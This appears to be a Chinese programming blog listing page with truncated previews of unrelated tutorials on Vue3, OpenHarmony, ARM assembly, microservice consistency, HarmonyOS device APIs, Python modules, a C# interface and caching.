参考 CodeBuddy&#xff0c;AI 时代的智能编程伙伴 插件功能入门 总结 本文主要基于CodeBuddy的Craft 完成一个数字华容道的小游戏&#xff0c;如果读者还不清楚怎么安装&#xff0c;在本文的前面附上了CodeBuddy 编程助手的安装步骤。读者可以根据需求自行确定从那开始。 …...

一文掌握vue3基础,适合自学入门案例丰富

Vue3 本文从Vue3的基础语法出发&#xff0c;全面系统的介绍了Vue3的核心概念与应用&#xff0c;旨在帮助自学者更轻松地掌握Vue3。文章内容由浅入深&#xff0c;从通过CDN引入Vue3开始&#xff0c;逐步介绍了组合式API、模块化开发、以及常见的Vue3指令和功能并从单个html的使…...

OpenHarmony 5.0设置应用设置手势导航开关打开后重新关闭导航栏和设置界面重合

目录 1.背景 2.解决方案 1.背景 在OpenHarmony 5.0中从设置界面打开手势导航开关然后重新关闭&#xff0c;此时设置界面导航栏和设置列表主界面重合&#xff0c;导致设置界面无法点击最下面的关于设备 2.解决方案 首先参考之前的如何设置导航栏文档&#xff0c;我们可以自己…...

[ARM][汇编] 02.ARM 汇编常用简单指令

目录 1.数据传输指令 MRS - Move from Status Register 指令用途 指令语法 代码示例 读取 CPSR 到通用寄存器 在异常处理程序中读取 SPSR 使用场景 MSR - Move to Status Register 指令语法 使用场景 示例代码 改变处理器模式为管理模式 设置条件标志位 异常处理…...

系统架构设计(十七):微服务数据一致性和高可用策略

数据一致性问题 问题本质 由于每个微服务拥有独立数据库&#xff0c;跨服务操作不能用传统的数据库事务&#xff0c;面临“分布式事务”一致性挑战。 数据一致性策略 策略核心思想应用场景优缺点强一致性&#xff08;Strong Consistency&#xff09;所有操作实时同步成功&a…...

[Harmony]获取设备参数

获取屏幕宽度/屏幕高度/状态栏高度/导航栏高度/刘海高度/设备型号/系统版本号... DevicesUtil import window from ohos.window; import { common } from kit.AbilityKit; import display from ohos.display; import deviceInfo from ohos.deviceInfo; import i18n from ohos.…...

Python60日基础学习打卡D31

如何把一个文件&#xff0c;拆分成多个具有着独立功能的文件&#xff0c;然后通过import的方式&#xff0c;来调用这些文件&#xff1f;这样具有几个好处&#xff1a; 可以让项目文件变得更加规范和清晰可以让项目文件更加容易维护&#xff0c;修改某一个功能的时候&#xff0…...

命名常量集合接口INamedConstantCollection<T>实现

public interface INamedConstantCollection<TObject, TName> : IEnumerable<TObject>, IEnumerable where TName : IComparable{TObject this[TName name] { get; }TObject this[int index] { get; }int Count { get; }int Capacity { get; }} 这是一个泛型接口&…...

TYUT-企业级开发教程-第6章

这一章 考点不多 什么是缓存&#xff1f;为什么要设计出缓存&#xff1f; 企业级应用为了避免读取数据时受限于数据库的访问效率而导致整体系统性能偏低&#xff0c;通 常会在应用程序与数据库之间建立一种临时的数据存储机制&#xff0c;该临时存储数据的区域称 为缓存。缓存…...